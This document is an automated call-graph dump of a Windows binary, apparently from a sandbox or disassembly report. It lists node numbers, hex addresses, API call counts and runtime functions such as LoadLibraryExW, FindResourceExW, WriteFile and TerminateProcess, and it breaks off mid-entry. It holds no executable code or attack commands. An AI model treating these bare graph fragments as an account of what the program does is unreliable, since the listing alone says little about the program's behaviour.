4a4856 98441->98440 98647 4ca0b5 89 API calls 4 library calls 98441->98647 98443 46f65d 98443->98440 98443->98441 98443->98444 98514 464faa 98444->98514 98520 4ccde5 98444->98520 98600 4de237 98444->98600 98603 4c3e73 98444->98603 98446 46f743 98446->98440 98606 469df0 59 API calls Mailbox 98446->98606 98451->98365 98452->98365 98453->98295 98454->98300 98455->98365 98456->98302 98457->98302 98458->98302 98459->98365 98460->98365 98461->98365 98463 4699b1 98462->98463 98472 4699ab 98462->98472 98464 4699f9 98463->98464 98465 49f9fc __i64tow 98463->98465 98467 4699b7 __itow 98463->98467 98470 49f903 98463->98470 99702 4838d8 83 API calls 3 library calls 98464->99702 98465->98465 98469 480ff6 Mailbox 59 API calls 98467->98469 98471 4699d1 98469->98471 98473 480ff6 Mailbox 59 API calls 98470->98473 98479 49f97b Mailbox _wcscpy 98470->98479 98471->98472 98474 467f41 59 API calls 98471->98474 98472->98365 98475 49f948 98473->98475 98474->98472 98476 480ff6 Mailbox 59 API calls 98475->98476 98477 49f96e 98476->98477 98478 467f41 59 API calls 98477->98478 98477->98479 98478->98479 99703 4838d8 83 API calls 3 library calls 98479->99703 98480->98365 98481->98365 98482->98365 98483->98349 98484->98349 98485->98349 98486->98349 98487->98349 98488->98349 98489->98349 98490->98431 98491->98431 98492->98431 98493->98431 98494->98431 98495->98431 98496->98424 98497->98431 98498->98431 98500 46f41c 98499->98500 98503 46f59a 98499->98503 98500->98503 98511 46f459 _memmove 98500->98511 98502 4a47d3 98502->98443 98649 4ca0b5 89 API calls 4 library calls 98503->98649 98504 46f533 98505 46f543 98504->98505 98648 4da5ee 85 API calls Mailbox 98504->98648 98505->98443 98507 480ff6 59 API calls Mailbox 98507->98511 98508 4a4823 98651 46f803 341 API calls 98508->98651 98510 46a000 341 API calls 98510->98511 98511->98502 98511->98504 98511->98507 98511->98508 98511->98510 98512 4a47d5 98511->98512 98650 4ca0b5 89 API calls 4 library calls 98512->98650 98515 464fb4 98514->98515 98517 464fbb 98514->98517 98652 4855d6 98515->98652 98518 464fca 98517->98518 98519 464fdb FreeLibrary 98517->98519 98518->98446 98519->98518 98521 4677c7 59 API calls 98520->98521 98522 4cce1a 98521->98522 98523 4677c7 59 API calls 98522->98523 98524 4cce23 98523->98524 98527 4cce37 98524->98527 99109 469c9c 59 API calls 98524->99109 98526 469997 84 API calls 98528 4cce54 98526->98528 98527->98526 98529 4ccf55 98528->98529 98530 4cce76 98528->98530 98599 4ccf85 Mailbox 98528->98599 98922 464f3d 98529->98922 98531 469997 84 API calls 98530->98531 98533 4cce82 98531->98533 98535 4681a7 59 API calls 98533->98535 98538 4cce8e 98535->98538 98536 4ccf81 98537 4677c7 59 API calls 98536->98537 98536->98599 98540 4ccfb6 98537->98540 98543 4cced4 98538->98543 98544 4ccea2 98538->98544 98539 464f3d 136 API calls 98539->98536 98541 4677c7 59 API calls 98540->98541 98542 4ccfbf 98541->98542 98546 4677c7 59 API calls 98542->98546 98545 469997 84 API calls 98543->98545 98547 4681a7 59 API calls 98544->98547 98548 4ccee1 98545->98548 98549 4ccfc8 98546->98549 98550 4cceb2 98547->98550 98551 4681a7 59 API calls 98548->98551 98552 4677c7 59 API calls 98549->98552 99110 467e0b 98550->99110 98554 4cceed 98551->98554 98555 4ccfd1 98552->98555 99117 4c4cd3 GetFileAttributesW 98554->99117 98558 469997 84 API calls 98555->98558 98561 4ccfde 98558->98561 98559 469997 84 API calls 98562 4ccec8 98559->98562 98560 4ccef6 98564 4ccf09 98560->98564 98566 467b52 59 API calls 98560->98566 98946 4646f9 98561->98946 98563 467c8e 59 API calls 98562->98563 98563->98543 98568 469997 84 API calls 98564->98568 98573 4ccf0f 98564->98573 98566->98564 98567 4ccff9 98997 467b52 98567->98997 98569 4ccf36 98568->98569 99118 4c3a2b 75 API calls Mailbox 98569->99118 98573->98599 98574 4cd03c 98575 4681a7 59 API calls 98574->98575 98578 4cd04a 98575->98578 98576 467b52 59 API calls 98577 4cd019 98576->98577 98577->98574 98580 467d2c 59 API calls 98577->98580 98579 467c8e 59 API calls 98578->98579 98581 4cd058 98579->98581 98582 4cd02e 98580->98582 98583 467c8e 59 API calls 98581->98583 98584 467d2c 59 API calls 98582->98584 98585 4cd066 98583->98585 98584->98574 98586 467c8e 59 API calls 98585->98586 98587 4cd074 98586->98587 98588 469997 84 API calls 98587->98588 98589 4cd080 98588->98589 99000 4c42ad 98589->99000 98599->98446 99579 4dcdf1 98600->99579 98602 4de247 98602->98446 99690 4c4696 GetFileAttributesW 98603->99690 98606->98446 98608 4dbfab 98607->98608 98609 4dbfc5 98607->98609 99694 4ca0b5 89 API calls 4 library calls 98608->99694 99695 4da528 59 API calls Mailbox 98609->99695 98612 4dbfd0 98613 46a000 340 API calls 98612->98613 98614 4dc031 98613->98614 98615 4dc0c3 98614->98615 98619 4dc072 98614->98619 98640 4dbfbd Mailbox 98614->98640 98616 4dc119 98615->98616 98617 4dc0c9 98615->98617 98618 469997 84 API calls 98616->98618 98616->98640 99697 4c7ba4 59 API calls 98617->99697 98620 4dc12b 98618->98620 99696 4c7581 59 API calls Mailbox 98619->99696 98623 467faf 59 API calls 98620->98623 98626 4dc14f CharUpperBuffW 98623->98626 98624 4dc0ec 99698 465ea1 59 API calls Mailbox 98624->99698 98625 4dc0a2 98628 46f5c0 340 API calls 98625->98628 98630 4dc169 98626->98630 98628->98640 98629 4dc0f4 Mailbox 98633 46fe40 340 API calls 98629->98633 98631 4dc1bc 98630->98631 98632 4dc170 98630->98632 98634 469997 84 API calls 98631->98634 99699 4c7581 59 API calls Mailbox 98632->99699 98633->98640 98635 4dc1c4 98634->98635 99700 469fbd 60 API calls 98635->99700 98638 4dc19e 98639 46f5c0 340 API calls 98638->98639 98639->98640 98640->98441 98641 4dc1ce 98641->98640 98642 469997 84 API calls 98641->98642 98643 4dc1e9 98642->98643 99701 465ea1 59 API calls Mailbox 98643->99701 98645 4dc1f9 98646 46fe40 340 API calls 98645->98646 98646->98640 98647->98440 98648->98505 98649->98502 98650->98502 98651->98502 98653 4855e2 ___lock_fhandle 98652->98653 98654 4855f6 98653->98654 98655 48560e 98653->98655 98687 488d68 58 API calls __getptd_noexit 98654->98687 98661 485606 ___lock_fhandle 98655->98661 98665 486e4e 98655->98665 98658 4855fb 98688 488ff6 9 API calls __wcsicmp_l 98658->98688 98661->98517 98666 486e5e 98665->98666 98667 486e80 EnterCriticalSection 98665->98667 98666->98667 98668 486e66 98666->98668 98669 485620 98667->98669 98670 489e4b __lock 58 API calls 98668->98670 98671 48556a 98669->98671 98670->98669 98672 485579 98671->98672 98675 48558d 98671->98675 98733 488d68 58 API calls __getptd_noexit 98672->98733 98674 485589 98689 485645 LeaveCriticalSection LeaveCriticalSection _fseek 98674->98689 98675->98674 98690 484c6d 98675->98690 98676 48557e 98734 488ff6 9 API calls __wcsicmp_l 98676->98734 98683 4855a7 98707 490c52 98683->98707 98685 4855ad 98685->98674 98686 482f95 _free 58 API calls 98685->98686 98686->98674 98687->98658 98688->98661 98689->98661 98691 484c80 98690->98691 98692 484ca4 98690->98692 98691->98692 98693 484916 __fflush_nolock 58 API calls 98691->98693 98696 490dc7 98692->98696 98694 484c9d 98693->98694 98735 48dac6 98694->98735 98697 4855a1 98696->98697 98698 490dd4 98696->98698 98700 484916 98697->98700 98698->98697 98699 482f95 _free 58 API calls 98698->98699 98699->98697 98701 484920 98700->98701 98702 484935 98700->98702 98877 488d68 58 API calls __getptd_noexit 98701->98877 98702->98683 98704 484925 98878 488ff6 9 API calls __wcsicmp_l 98704->98878 98706 484930 98706->98683 98708 490c5e ___lock_fhandle 98707->98708 98709 490c6b 98708->98709 98710 490c82 98708->98710 98894 488d34 58 API calls __getptd_noexit 98709->98894 98712 490d0d 98710->98712 98714 490c92 98710->98714 98899 488d34 58 API calls __getptd_noexit 98712->98899 98713 490c70 98895 488d68 58 API calls __getptd_noexit 98713->98895 98717 490cba 98714->98717 98718 490cb0 98714->98718 98720 48d446 ___lock_fhandle 59 API calls 98717->98720 98896 488d34 58 API calls __getptd_noexit 98718->98896 98719 490cb5 98900 488d68 58 API calls __getptd_noexit 98719->98900 98722 490cc0 98720->98722 98725 490cde 98722->98725 98726 490cd3 98722->98726 98724 490d19 98901 488ff6 9 API calls __wcsicmp_l 98724->98901 98897 488d68 58 API calls __getptd_noexit 98725->98897 98879 490d2d 98726->98879 98729 490c77 ___lock_fhandle 98729->98685 98731 490cd9 98898 490d05 LeaveCriticalSection __unlock_fhandle 98731->98898 98733->98676 98734->98674 98736 48dad2 ___lock_fhandle 98735->98736 98737 48dadf 98736->98737 98738 48daf6 98736->98738 98836 488d34 58 API calls __getptd_noexit 98737->98836 98740 48db95 98738->98740 98742 48db0a 98738->98742 98842 488d34 58 API calls __getptd_noexit 98740->98842 98741 48dae4 98837 488d68 58 API calls __getptd_noexit 98741->98837 98745 48db28 98742->98745 98746 48db32 98742->98746 98838 488d34 58 API calls __getptd_noexit 98745->98838 98763 48d446 98746->98763 98747 48db2d 98843 488d68 58 API calls __getptd_noexit 98747->98843 98749 48daeb ___lock_fhandle 98749->98692 98751 48db38 98753 48db4b 98751->98753 98754 48db5e 98751->98754 98772 48dbb5 98753->98772 98839 488d68 58 API calls __getptd_noexit 98754->98839 98755 48dba1 98844 488ff6 9 API calls __wcsicmp_l 98755->98844 98759 48db57 98841 48db8d LeaveCriticalSection __unlock_fhandle 98759->98841 98760 48db63 98840 488d34 58 API calls __getptd_noexit 98760->98840 98764 48d452 ___lock_fhandle 98763->98764 98765 48d4a1 EnterCriticalSection 98764->98765 98767 489e4b __lock 58 API calls 98764->98767 98766 48d4c7 ___lock_fhandle 98765->98766 98766->98751 98768 48d477 98767->98768 98771 48d48f 98768->98771 98845 48a06b InitializeCriticalSectionAndSpinCount 98768->98845 98846 48d4cb LeaveCriticalSection _doexit 98771->98846 98773 48dbc2 __write_nolock 98772->98773 98774 48dc20 98773->98774 98775 48dc01 98773->98775 98800 48dbf6 98773->98800 98778 48dc78 98774->98778 98779 48dc5c 98774->98779 98856 488d34 58 API calls __getptd_noexit 98775->98856 98783 48dc91 98778->98783 98862 491b11 60 API calls 3 library calls 98778->98862 98859 488d34 58 API calls __getptd_noexit 98779->98859 98780 48e416 98780->98759 98781 48dc06 98857 488d68 58 API calls __getptd_noexit 98781->98857 98847 495ebb 98783->98847 98786 48dc61 98860 488d68 58 API calls __getptd_noexit 98786->98860 98788 48dc0d 98858 488ff6 9 API calls __wcsicmp_l 98788->98858 98789 48dc9f 98792 48dff8 98789->98792 98863 489bec 58 API calls 2 library calls 98789->98863 98794 48e38b WriteFile 98792->98794 98795 48e016 98792->98795 98793 48dc68 98861 488ff6 9 API calls __wcsicmp_l 98793->98861 98798 48dfeb GetLastError 98794->98798 98805 48dfb8 98794->98805 98799 48e13a 98795->98799 98808 48e02c 98795->98808 98798->98805 98811 48e22f 98799->98811 98813 48e145 98799->98813 98870 48c836 98800->98870 98801 48dccb GetConsoleMode 98801->98792 98803 48dd0a 98801->98803 98802 48e3c4 98802->98800 98868 488d68 58 API calls __getptd_noexit 98802->98868 98803->98792 98806 48dd1a GetConsoleCP 98803->98806 98805->98800 98805->98802 98810 48e118 98805->98810 98806->98802 98832 48dd49 98806->98832 98807 48e09b WriteFile 98807->98798 98812 48e0d8 98807->98812 98808->98802 98808->98807 98809 48e3f2 98869 488d34 58 API calls __getptd_noexit 98809->98869 98815 48e3bb 98810->98815 98816 48e123 98810->98816 98811->98802 98817 48e2a4 WideCharToMultiByte 98811->98817 98812->98808 98818 48e0fc 98812->98818 98813->98802 98819 48e1aa WriteFile 98813->98819 98867 488d47 58 API calls 2 library calls 98815->98867 98865 488d68 58 API calls __getptd_noexit 98816->98865 98817->98798 98828 48e2eb 98817->98828 98818->98805 98819->98798 98820 48e1f9 98819->98820 98820->98805 98820->98813 98820->98818 98823 48e128 98866 488d34 58 API calls __getptd_noexit 98823->98866 98824 48e2f3 WriteFile 98825 48e346 GetLastError 98824->98825 98824->98828 98825->98828 98828->98805 98828->98811 98828->98818 98828->98824 98829 49650a 60 API calls __write_nolock 98829->98832 98830 48de32 WideCharToMultiByte 98830->98805 98831 48de6d WriteFile 98830->98831 98831->98798 98834 48de9f 98831->98834 98832->98805 98832->98829 98832->98830 98832->98834 98864 483835 58 API calls __isleadbyte_l 98832->98864 98833 497cae WriteConsoleW CreateFileW __putwch_nolock 98833->98834 98834->98798 98834->98805 98834->98832 98834->98833 98835 48dec7 WriteFile 98834->98835 98835->98798 98835->98834 98836->98741 98837->98749 98838->98747 98839->98760 98840->98759 98841->98749 98842->98747 98843->98755 98844->98749 98845->98771 98846->98765 98848 495ed3 98847->98848 98849 495ec6 98847->98849 98851 488d68 __wcsicmp_l 58 API calls 98848->98851 98853 495edf 98848->98853 98850 488d68 __wcsicmp_l 58 API calls 98849->98850 98852 495ecb 98850->98852 98854 495f00 98851->98854 98852->98789 98853->98789 98855 488ff6 __wcsicmp_l 9 API calls 98854->98855 98855->98852 98856->98781 98857->98788 98858->98800 98859->98786 98860->98793 98861->98800 98862->98783 98863->98801 98864->98832 98865->98823 98866->98800 98867->98800 98868->98809 98869->98800 98871 48c83e 98870->98871 98872 48c840 IsProcessorFeaturePresent 98870->98872 98871->98780 98874 495b5a 98872->98874 98875 495b09 ___raise_securityfailure 5 API calls 98874->98875 98876 495c3d 98875->98876 98876->98780 98877->98704 98878->98706 98902 48d703 98879->98902 98881 490d91 98915 48d67d 59 API calls 2 library calls 98881->98915 98882 490d3b 98882->98881 98884 48d703 __lseek_nolock 58 API calls 98882->98884 98893 490d6f 98882->98893 98888 490d66 98884->98888 98885 48d703 __lseek_nolock 58 API calls 98889 490d7b CloseHandle 98885->98889 98886 490dbb 98886->98731 98887 490d99 98887->98886 98916 488d47 58 API calls 2 library calls 98887->98916 98891 48d703 __lseek_nolock 58 API calls 98888->98891 98889->98881 98892 490d87 GetLastError 98889->98892 98891->98893 98892->98881 98893->98881 98893->98885 98894->98713 98895->98729 98896->98719 98897->98731 98898->98729 98899->98719 98900->98724 98901->98729 98903 48d70e 98902->98903 98907 48d723 98902->98907 98917 488d34 58 API calls __getptd_noexit 98903->98917 98906 48d713 98918 488d68 58 API calls __getptd_noexit 98906->98918 98910 48d748 98907->98910 98919 488d34 58 API calls __getptd_noexit 98907->98919 98908 48d752 98920 488d68 58 API calls __getptd_noexit 98908->98920 98910->98882 98912 48d71b 98912->98882 98913 48d75a 98921 488ff6 9 API calls __wcsicmp_l 98913->98921 98915->98887 98916->98886 98917->98906 98918->98912 98919->98908 98920->98913 98921->98912 99119 464d13 98922->99119 98927 49dd0f 98929 464faa 84 API calls 98927->98929 98928 464f68 LoadLibraryExW 99129 464cc8 98928->99129 98931 49dd16 98929->98931 98933 464cc8 3 API calls 98931->98933 98935 49dd1e 98933->98935 99155 46506b 98935->99155 98936 464f8f 98936->98935 98937 464f9b 98936->98937 98938 464faa 84 API calls 98937->98938 98940 464fa0 98938->98940 98940->98536 98940->98539 98943 49dd45 99163 465027 98943->99163 98947 4677c7 59 API calls 98946->98947 98948 46470f 98947->98948 98949 4677c7 59 API calls 98948->98949 98950 464717 98949->98950 98951 4677c7 59 API calls 98950->98951 98952 46471f 98951->98952 98953 4677c7 59 API calls 98952->98953 98954 464727 98953->98954 98955 49d8fb 98954->98955 98956 46475b 98954->98956 98957 4681a7 59 API calls 98955->98957 98958 4679ab 59 API calls 98956->98958 98959 49d904 98957->98959 98960 464769 98958->98960 99450 467eec 98959->99450 98962 467e8c 59 API calls 98960->98962 98963 464773 98962->98963 98964 46479e 98963->98964 98965 4679ab 59 API calls 98963->98965 98966 4647de 98964->98966 98968 4647bd 98964->98968 98979 49d924 98964->98979 98969 464794 98965->98969 99437 4679ab 98966->99437 98973 467b52 59 API calls 98968->98973 98972 467e8c 59 API calls 98969->98972 98970 4647ef 98974 464801 98970->98974 98977 4681a7 59 API calls 98970->98977 98971 49d9f4 98975 467d2c 59 API calls 98971->98975 98972->98964 98976 4647c7 98973->98976 98978 464811 98974->98978 98981 4681a7 59 API calls 98974->98981 98986 49d9b1 98975->98986 98976->98966 98980 4679ab 59 API calls 98976->98980 98977->98974 98983 464818 98978->98983 98984 4681a7 59 API calls 98978->98984 98979->98971 98982 49d9dd 98979->98982 98992 49d95b 98979->98992 98980->98966 98981->98978 98982->98971 98988 49d9c8 98982->98988 98985 4681a7 59 API calls 98983->98985 98993 46481f Mailbox 98983->98993 98984->98983 98985->98993 98986->98966 98987 467b52 59 API calls 98986->98987 99454 467a84 59 API calls 2 library calls 98986->99454 98987->98986 98990 467d2c 59 API calls 98988->98990 98989 49d9b9 98991 467d2c 59 API calls 98989->98991 98990->98986 98991->98986 98992->98989 98995 49d9a4 98992->98995 98993->98567 98996 467d2c 59 API calls 98995->98996 98996->98986 98998 467faf 59 API calls 98997->98998 98999 467b5d 98998->98999 98999->98574 98999->98576 99109->98527 99111 467e1f 99110->99111 99112 49f173 99110->99112 99574 467db0 99111->99574 99113 468189 59 API calls 99112->99113 99116 49f17e __wsetenvp _memmove 99113->99116 99115 467e2a 99115->98559 99117->98560 99118->98573 99168 464d61 99119->99168 99122 464d53 99126 48548b 99122->99126 99123 464d4a FreeLibrary 99123->99122 99124 464d61 2 API calls 99125 464d3a 99124->99125 99125->99122 99125->99123 99172 4854a0 99126->99172 99128 464f5c 99128->98927 99128->98928 99253 464d94 99129->99253 99132 464ced 99133 464cff FreeLibrary 99132->99133 99134 464d08 99132->99134 99133->99134 99136 464dd0 99134->99136 99135 464d94 2 API calls 99135->99132 99137 480ff6 Mailbox 59 API calls 99136->99137 99138 464de5 99137->99138 99257 46538e 99138->99257 99140 464df1 _memmove 99141 464e2c 99140->99141 99143 464f21 99140->99143 99144 464ee9 99140->99144 99142 465027 69 API calls 99141->99142 99151 464e35 99142->99151 99271 4c9ba5 95 API calls 99143->99271 99260 464fe9 CreateStreamOnHGlobal 99144->99260 99147 46506b 74 API calls 99147->99151 99149 464ec9 99149->98936 99150 49dcd0 99152 465045 85 API calls 99150->99152 99151->99147 99151->99149 99151->99150 99266 465045 99151->99266 99153 49dce4 99152->99153 99154 46506b 74 API calls 99153->99154 99154->99149 99156 46507d 99155->99156 99157 49ddf6 99155->99157 99289 485812 99156->99289 99160 4c9393 99414 4c91e9 99160->99414 99162 4c93a9 99162->98943 99164 49ddb9 99163->99164 99165 465036 99163->99165 99419 485e90 99165->99419 99167 46503e 99169 464d2e 99168->99169 99170 464d6a LoadLibraryA 99168->99170 99169->99124 99169->99125 99170->99169 99171 464d7b GetProcAddress 99170->99171 99171->99169 99173 4854ac ___lock_fhandle 99172->99173 99174 4854bf 99173->99174 99177 4854f0 99173->99177 99221 488d68 58 API calls __getptd_noexit 99174->99221 99176 4854c4 99222 488ff6 9 API calls __wcsicmp_l 99176->99222 99191 490738 99177->99191 99180 4854f5 99181 48550b 99180->99181 99182 4854fe 99180->99182 99183 485535 99181->99183 99184 485515 99181->99184 99223 488d68 58 API calls __getptd_noexit 99182->99223 99206 490857 99183->99206 99224 488d68 58 API calls __getptd_noexit 99184->99224 99188 4854cf ___lock_fhandle @_EH4_CallFilterFunc@8 99188->99128 99192 490744 ___lock_fhandle 99191->99192 99193 489e4b __lock 58 API calls 99192->99193 99204 490752 99193->99204 99194 4907c6 99226 49084e 99194->99226 99195 4907cd 99231 488a5d 58 API calls 2 library calls 99195->99231 99198 4907d4 99198->99194 99232 48a06b InitializeCriticalSectionAndSpinCount 99198->99232 99199 490843 ___lock_fhandle 99199->99180 99201 489ed3 __mtinitlocknum 58 API calls 99201->99204 99203 4907fa EnterCriticalSection 99203->99194 99204->99194 99204->99195 99204->99201 99229 486e8d 59 API calls __lock 99204->99229 99230 486ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99204->99230 99215 490877 __wopenfile 99206->99215 99207 490891 99237 488d68 58 API calls __getptd_noexit 99207->99237 99208 490a4c 99208->99207 99212 490aaf 99208->99212 99210 490896 99238 488ff6 9 API calls __wcsicmp_l 99210->99238 99234 4987f1 99212->99234 99213 485540 99225 485562 LeaveCriticalSection LeaveCriticalSection _fseek 99213->99225 99215->99207 99215->99208 99239 483a0b 60 API calls 2 library calls 99215->99239 99217 490a45 99217->99208 99240 483a0b 60 API calls 2 library calls 99217->99240 99219 490a64 99219->99208 99241 483a0b 60 API calls 2 library calls 99219->99241 99221->99176 99222->99188 99223->99188 99224->99188 99225->99188 99233 489fb5 LeaveCriticalSection 99226->99233 99228 490855 99228->99199 99229->99204 99230->99204 99231->99198 99232->99203 99233->99228 99242 497fd5 99234->99242 99236 49880a 99236->99213 99237->99210 99238->99213 99239->99217 99240->99219 99241->99208 99245 497fe1 ___lock_fhandle 99242->99245 99243 497ff7 99244 488d68 __wcsicmp_l 58 API calls 99243->99244 99246 497ffc 99244->99246 99245->99243 99247 49802d 99245->99247 99248 488ff6 __wcsicmp_l 9 API calls 99246->99248 99249 49809e __wsopen_nolock 109 API calls 99247->99249 99252 498006 ___lock_fhandle 99248->99252 99250 498049 99249->99250 99251 498072 __wsopen_helper LeaveCriticalSection 99250->99251 99251->99252 99252->99236 99254 464ce1 99253->99254 99255 464d9d LoadLibraryA 99253->99255 99254->99132 99254->99135 99255->99254 99256 464dae GetProcAddress 99255->99256 99256->99254 99258 480ff6 Mailbox 59 API calls 99257->99258 99259 4653a0 99258->99259 99259->99140 99261 465003 FindResourceExW 99260->99261 99265 465020 99260->99265 99262 49dd5c LoadResource 99261->99262 99261->99265 99263 49dd71 SizeofResource 99262->99263 99262->99265 99264 49dd85 LockResource 99263->99264 99263->99265 99264->99265 99265->99141 99267 465054 99266->99267 99270 49ddd4 99266->99270 99272 485a7d 99267->99272 99269 465062 99269->99151 99271->99141 99273 485a89 ___lock_fhandle 99272->99273 99274 485a9b 99273->99274 99275 485ac1 99273->99275 99285 488d68 58 API calls __getptd_noexit 99274->99285 99277 486e4e __lock_file 59 API calls 99275->99277 99279 485ac7 99277->99279 99278 485aa0 99286 488ff6 9 API calls __wcsicmp_l 99278->99286 99287 4859ee 83 API calls 5 library calls 99279->99287 99282 485ad6 99288 485af8 LeaveCriticalSection LeaveCriticalSection _fseek 99282->99288 99284 485aab ___lock_fhandle 99284->99269 99285->99278 99286->99284 99287->99282 99288->99284 99292 48582d 99289->99292 99291 46508e 99291->99160 99293 485839 ___lock_fhandle 99292->99293 99294 48587c 99293->99294 99295 48584f _memset 99293->99295 99296 485874 ___lock_fhandle 99293->99296 99297 486e4e __lock_file 59 API calls 99294->99297 99319 488d68 58 API calls __getptd_noexit 99295->99319 99296->99291 99298 485882 99297->99298 99305 48564d 99298->99305 99301 485869 99320 488ff6 9 API calls __wcsicmp_l 99301->99320 99306 485683 99305->99306 99309 485668 _memset 99305->99309 99321 4858b6 LeaveCriticalSection LeaveCriticalSection _fseek 99306->99321 99307 485673 99410 488d68 58 API calls __getptd_noexit 99307->99410 99309->99306 99309->99307 99312 4856c3 99309->99312 99312->99306 99313 484916 __fflush_nolock 58 API calls 99312->99313 99315 4857d4 _memset 99312->99315 99322 4910ab 99312->99322 99390 490df7 99312->99390 99412 490f18 58 API calls 3 library calls 99312->99412 99313->99312 99413 488d68 58 API calls __getptd_noexit 99315->99413 99318 485678 99411 488ff6 9 API calls __wcsicmp_l 99318->99411 99319->99301 99320->99296 99321->99296 99323 4910cc 99322->99323 99324 4910e3 99322->99324 99325 488d34 __dosmaperr 58 API calls 99323->99325 99326 49181b 99324->99326 99330 49111d 99324->99330 99327 4910d1 99325->99327 99328 488d34 __dosmaperr 58 API calls 99326->99328 99329 488d68 __wcsicmp_l 58 API calls 99327->99329 99331 491820 99328->99331 99370 4910d8 99329->99370 99332 491125 99330->99332 99338 49113c 99330->99338 99333 488d68 __wcsicmp_l 58 API calls 99331->99333 99334 488d34 __dosmaperr 58 API calls 99332->99334 99335 491131 99333->99335 99336 49112a 99334->99336 99337 488ff6 __wcsicmp_l 9 API calls 99335->99337 99342 488d68 __wcsicmp_l 58 API calls 99336->99342 99337->99370 99339 491151 99338->99339 99341 49116b 99338->99341 99343 491189 99338->99343 99338->99370 99340 488d34 __dosmaperr 58 API calls 99339->99340 99340->99336 99341->99339 99346 491176 99341->99346 99342->99335 99344 488a5d __malloc_crt 58 API calls 99343->99344 99347 491199 99344->99347 99345 495ebb __write_nolock 58 API calls 99348 49128a 99345->99348 99346->99345 99349 4911bc 99347->99349 99350 4911a1 99347->99350 99352 491303 ReadFile 99348->99352 99357 4912a0 GetConsoleMode 99348->99357 99353 491b11 __lseeki64_nolock 60 API calls 99349->99353 99351 488d68 __wcsicmp_l 58 API calls 99350->99351 99354 4911a6 99351->99354 99355 4917e3 GetLastError 99352->99355 99356 491325 99352->99356 99353->99346 99358 488d34 __dosmaperr 58 API calls 99354->99358 99359 4917f0 99355->99359 99360 4912e3 99355->99360 99356->99355 99364 4912f5 99356->99364 99361 491300 99357->99361 99362 4912b4 99357->99362 99358->99370 99363 488d68 __wcsicmp_l 58 API calls 99359->99363 99368 488d47 __dosmaperr 58 API calls 99360->99368 99375 4912e9 99360->99375 99361->99352 99362->99361 99365 4912ba ReadConsoleW 99362->99365 99366 4917f5 99363->99366 99372 49135a 99364->99372 99373 4915c7 99364->99373 99364->99375 99365->99364 99367 4912dd GetLastError 99365->99367 99369 488d34 __dosmaperr 58 API calls 99366->99369 99367->99360 99368->99375 99369->99375 99370->99312 99371 482f95 _free 58 API calls 99371->99370 99374 491447 99372->99374 99377 4913c6 ReadFile 99372->99377 99373->99375 99378 4916cd ReadFile 99373->99378 99374->99375 99380 491504 99374->99380 99381 4914f4 99374->99381 99385 4914b4 MultiByteToWideChar 99374->99385 99375->99370 99375->99371 99379 4913e7 GetLastError 99377->99379 99388 4913f1 99377->99388 99383 4916f0 GetLastError 99378->99383 99389 4916fe 99378->99389 99379->99388 99384 491b11 __lseeki64_nolock 60 API calls 99380->99384 99380->99385 99382 488d68 __wcsicmp_l 58 API calls 99381->99382 99382->99375 99383->99389 99384->99385 99385->99367 99385->99375 99386 491b11 __lseeki64_nolock 60 API calls 99386->99388 99387 491b11 __lseeki64_nolock 60 API calls 99387->99389 99388->99372 99388->99386 99389->99373 99389->99387 99391 490e02 99390->99391 99395 490e17 99390->99395 99392 488d68 __wcsicmp_l 58 API calls 99391->99392 99393 490e07 99392->99393 99394 488ff6 __wcsicmp_l 9 API calls 99393->99394 99401 490e12 99394->99401 99396 490e4c 99395->99396 99397 496234 __getbuf 58 API calls 99395->99397 99395->99401 99398 484916 __fflush_nolock 58 API calls 99396->99398 99397->99396 99399 490e60 99398->99399 99400 490f97 __read 72 API calls 99399->99400 99402 490e67 99400->99402 99401->99312 99402->99401 99403 484916 __fflush_nolock 58 API calls 99402->99403 99404 490e8a 99403->99404 99404->99401 99405 484916 __fflush_nolock 58 API calls 99404->99405 99406 490e96 99405->99406 99406->99401 99407 484916 __fflush_nolock 58 API calls 99406->99407 99408 490ea3 99407->99408 99409 484916 __fflush_nolock 58 API calls 99408->99409 99409->99401 99410->99318 99411->99306 99412->99312 99413->99318 99417 48543a GetSystemTimeAsFileTime 99414->99417 99416 4c91f8 99416->99162 99418 485468 __aulldiv 99417->99418 99418->99416 99420 485e9c ___lock_fhandle 99419->99420 99421 485eae 99420->99421 99422 485ec3 99420->99422 99433 488d68 58 API calls __getptd_noexit 99421->99433 99423 486e4e __lock_file 59 API calls 99422->99423 99425 485ec9 99423->99425 99435 485b00 67 API calls 6 library calls 99425->99435 99426 485eb3 99434 488ff6 9 API calls __wcsicmp_l 99426->99434 99429 485ed4 99436 485ef4 LeaveCriticalSection LeaveCriticalSection _fseek 99429->99436 99431 485ee6 99432 485ebe ___lock_fhandle 99431->99432 99432->99167 99433->99426 99434->99432 99435->99429 99436->99431 99438 467a17 99437->99438 99439 4679ba 99437->99439 99441 467e8c 59 API calls 99438->99441 99439->99438 99440 4679c5 99439->99440 99442 4679e0 99440->99442 99443 49ef32 99440->99443 99447 4679e8 _memmove 99441->99447 99455 468087 59 API calls Mailbox 99442->99455 99445 468189 59 API calls 99443->99445 99446 49ef3c 99445->99446 99448 480ff6 Mailbox 59 API calls 99446->99448 99447->98970 99449 49ef5c 99448->99449 99451 467f06 99450->99451 99453 467ef9 99450->99453 99452 480ff6 Mailbox 59 API calls 99451->99452 99452->99453 99453->98964 99454->98986 99455->99447 99575 467dbf __wsetenvp 99574->99575 99576 468189 59 API calls 99575->99576 99577 467dd0 _memmove 99575->99577 99578 49f130 _memmove 99576->99578 99577->99115 99580 469997 84 API calls 99579->99580 99581 4dce2e 99580->99581 99604 4dce75 Mailbox 99581->99604 99617 4ddab9 99581->99617 99583 4dd0cd 99584 4dd242 99583->99584 99588 4dd0db 99583->99588 99667 4ddbdc 92 API calls Mailbox 99584->99667 99587 4dd251 99587->99588 99590 4dd25d 99587->99590 99630 4dcc82 99588->99630 99589 469997 84 API calls 99608 4dcec6 Mailbox 99589->99608 99590->99604 99595 4dd114 99645 480e48 99595->99645 99598 4dd12e 99651 4ca0b5 89 API calls 4 library calls 99598->99651 99599 4dd147 99652 46942e 99599->99652 99602 4dd139 GetCurrentProcess TerminateProcess 99602->99599 99604->98602 99608->99583 99608->99589 99608->99604 99649 4cf835 59 API calls 2 library calls 99608->99649 99650 4dd2f3 61 API calls 2 library calls 99608->99650 99609 4dd2b8 99609->99604 99613 4dd2cc FreeLibrary 99609->99613 99610 4dd17f 99664 4dd95d 107 API calls _free 99610->99664 99613->99604 99616 4dd190 99616->99609 99665 468ea0 59 API calls Mailbox 99616->99665 99666 469e9c 60 API calls Mailbox 99616->99666 99668 4dd95d 107 API calls _free 99616->99668 99618 467faf 59 API calls 99617->99618 99619 4ddad4 CharLowerBuffW 99618->99619 99669 